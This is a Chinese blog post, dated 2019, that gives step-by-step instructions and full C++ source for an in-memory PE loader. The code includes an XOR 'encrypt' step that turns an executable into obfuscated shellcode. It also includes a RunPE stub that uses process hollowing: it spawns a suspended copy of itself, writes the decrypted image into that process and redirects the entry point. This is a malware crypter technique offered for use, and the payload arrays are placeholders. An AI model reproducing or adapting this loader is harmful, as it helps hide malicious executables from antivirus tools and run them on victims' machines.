内存运行PE文件

内存中运行文件

拿exe并在HxD或010中打开 - cntrl+a copy as C
粘贴到encrypt.cpp
编译并运行encrypt.cpp - 创建shellcode.txt
从shellcode.txt复制char数组,并替换runPE.cpp中的rawData []
编译生成最终的runPE.exe
使用XOR密钥解密,加载到内存中执行。

encrypt.cpp

//encrypt shellcode prior to storing in stub
//store in shellcodeEncrypted.txt
//copy into runPE.cpp

#include <iostream>
#include <fstream>
#include <string>
using namespace std;

//Real PE shellcode dump here - fix length also
const int length = 2;
unsigned char rawData[length] = {
	0x00, 0xff
};


void crypt(unsigned char rawData[], int length)
{
	char key = 0x42;
	for (int i = 0; i < length; i++)
	{
		rawData[i] = (char)(rawData[i] ^ key);
	}
}

struct HexCharStruct
{
	unsigned char c;
	HexCharStruct(unsigned char _c) : c(_c) { }
};

inline std::ostream& operator<<(std::ostream& o, const HexCharStruct& hs)
{
	return (o << std::hex << (int)hs.c);
}

inline HexCharStruct hex(unsigned char _c)
{
	return HexCharStruct(_c);
}

int main()
{
	ofstream output;
	output.open("shellcodeEncrypted.txt");
	crypt(rawData, length);
	output << "unsigned char rawData[" << to_string(length) << "]" \
		<< " = { ";
	for (int i = 0; i < length; i++)
	{
		output << "0x" << hex(rawData[i]) << ",";
		if (i % 20 == 0)
		{
			output << endl;
		}
	}
	output << "};";
}

RunPE.cpp

#include <iostream> // Standard C++ library for console I/O
#include <string> // Standard C++ Library for string manip
#include <fstream> 
#include <Windows.h> // WinAPI Header
#include <TlHelp32.h> //WinAPI Process API


// use this if you want to read the executable from disk
HANDLE MapFileToMemory(LPCSTR filename)
{
	std::streampos size;
	std::fstream file(filename, std::ios::in | std::ios::binary | std::ios::ate);
	if (file.is_open())
	{
		size = file.tellg();

		char* Memblock = new char[size]();

		file.seekg(0, std::ios::beg);
		file.read(Memblock, size);
		file.close();

		return Memblock;
	}
	return 0;
}

int RunPortableExecutable(void* Image)
{
	IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
	IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
	IMAGE_SECTION_HEADER* SectionHeader;

	PROCESS_INFORMATION PI;
	STARTUPINFOA SI;

	CONTEXT* CTX;

	DWORD* ImageBase; //Base address of the image
	void* pImageBase; // Pointer to the image base

	int count;
	char CurrentFilePath[1024];

	DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable
	NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // Initialize

	GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable

	if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
	{
		ZeroMemory(&PI, sizeof(PI)); // Null the memory
		ZeroMemory(&SI, sizeof(SI)); // Null the memory

		if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
			CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
													 //process in suspended state, for the new image.
		{
			// Allocate memory for the context.
			CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
			CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

			if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
			{
				// Read instructions
				ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);

				pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
					NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

				// Write the image to the process
				WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

				for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
				{
					SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));

					WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
						LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
				}
				WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),
					LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);

				// Move address of entry point to the eax register
				CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
				SetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context
				ResumeThread(PI.hThread); //´Start the process/call main()

				return 0; // Operation was successful.
			}
		}
	}
}

// enter valid bytes of a program here.
//Using 010 Hex editor or HxD - copy all as C hex works perfectly. A complete hexdump, no magic ;)
void decrypt(unsigned char rawData[], int length)
{
	char key = 0x42;
	for (int i = 0; i < length; i++)
	{
		rawData[i] = (char)(rawData[i] ^ key);
	}
}

//Place encrypted shellcode here - fix length also!
const int length = 2;
unsigned char rawData[length] = {
	0x00, 0x00
};


int main()
{
	decrypt(rawData, length);
	RunPortableExecutable(rawData); // run executable from the array
	getchar();
}
posted @ 2019-08-28 10:09  17bdw  阅读(989)  评论(0编辑  收藏  举报